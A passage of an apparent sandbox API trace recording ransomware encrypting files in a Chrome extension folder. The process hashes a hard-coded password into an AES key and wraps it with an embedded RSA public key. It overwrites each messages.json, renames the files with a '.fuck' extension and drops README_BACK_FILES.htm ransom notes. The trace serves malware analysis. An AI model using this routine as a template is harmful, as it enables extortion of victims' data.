| out: phProv=0x2b9bc50*=0x293b3f0) returned 1 [0248.003] CryptImportPublicKeyInfo (in: hCryptProv=0x293b3f0, dwCertEncodingType=0x1, pInfo=0x292fc80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292fcb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292fcb8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936fb8) returned 1 [0248.003] CryptEncrypt (in: hKey=0x2936fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.003] CryptEncrypt (in: hKey=0x2936fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293b258*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293b258*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.003] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293b258*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293b258*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.004] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd9, lpOverlapped=0x0) returned 1 [0248.006] CryptEncrypt (in: hKey=0x2938978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd9, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0248.006] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.006] CloseHandle (hObject=0x5d58) returned 1 [0248.006] CloseHandle (hObject=0x5d5c) returned 1 [0248.007] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json"), bFailIfExists=0) returned 1 [0248.011] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json", dwFileAttributes=0x0) returned 1 [0248.012] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.gsg")) returned 1 [0248.014] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.fuck")) returned 1 [0248.015] CryptDestroyHash (hHash=0x2938af8) returned 1 [0248.015] CryptDestroyKey (hKey=0x2938978) returned 1 [0248.015] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.015] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.015] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.015] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\readme_back_files.htm")) returned 0xffffffff [0248.015] AreFileApisANSI () returned 1 [0248.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.016] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.016] GetFileType (hFile=0x5d50) returned 0x1 [0248.016] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.017] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.017] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.018] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.018] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.018] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.018] GetLastError () returned 0x0 [0248.018] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json")) returned 0x20 [0248.018] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json", dwFileAttributes=0x80) returned 1 [0248.019] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.019] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.030] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.031] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.034] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.034] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.034] CryptHashData (hHash=0x2938978, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.034] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29389f8) returned 1 [0248.034] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.034] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.034] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293bcf8) returned 1 [0248.035] CryptImportPublicKeyInfo (in: hCryptProv=0x293bcf8, dwCertEncodingType=0x1, pInfo=0x292f6d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292f700*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292f708*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936d78) returned 1 [0248.035] CryptEncrypt (in: hKey=0x2936d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.035] CryptEncrypt (in: hKey=0x2936d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293bd80*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293bd80*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.035] WriteFile (in: hFile=0x5d58, lpBuffer=0x293bd80*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293bd80*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.036] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.037] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0248.038] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0248.038] CloseHandle (hObject=0x5d5c) returned 1 [0248.038] CloseHandle (hObject=0x5d58) returned 1 [0248.039] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json"), bFailIfExists=0) returned 1 [0248.043] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json", dwFileAttributes=0x0) returned 1 [0248.043] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.gsg")) returned 1 [0248.045] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.fuck")) returned 1 [0248.046] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.046] CryptDestroyKey (hKey=0x29389f8) returned 1 [0248.046] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.046] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.046] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.047] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\readme_back_files.htm")) returned 0xffffffff [0248.047] AreFileApisANSI () returned 1 [0248.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0248.047] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.047] GetFileType (hFile=0x5d50) returned 0x1 [0248.048] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.049] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.049] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0248.050] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.050] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.050] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.050] GetLastError () returned 0x0 [0248.050] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json")) returned 0x20 [0248.050] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json", dwFileAttributes=0x80) returned 1 [0248.051] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.051] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.052] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.053] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.055] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.055] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.055] CryptHashData (hHash=0x29387f8, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.055] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29389f8) returned 1 [0248.056] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.056] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.056] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293b148) returned 1 [0248.056] CryptImportPublicKeyInfo (in: hCryptProv=0x293b148, dwCertEncodingType=0x1, pInfo=0x292ffc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292fff0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292fff8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936e38) returned 1 [0248.056] CryptEncrypt (in: hKey=0x2936e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.057] CryptEncrypt (in: hKey=0x2936e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293ba50*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293ba50*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.057] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293ba50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293ba50*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.058] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xde, lpOverlapped=0x0) returned 1 [0248.062] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xde, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0248.062] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.063] CloseHandle (hObject=0x5d58) returned 1 [0248.063] CloseHandle (hObject=0x5d5c) returned 1 [0248.069] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json"), bFailIfExists=0) returned 1 [0248.074] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json", dwFileAttributes=0x0) returned 1 [0248.074] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.gsg")) returned 1 [0248.076] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json"), 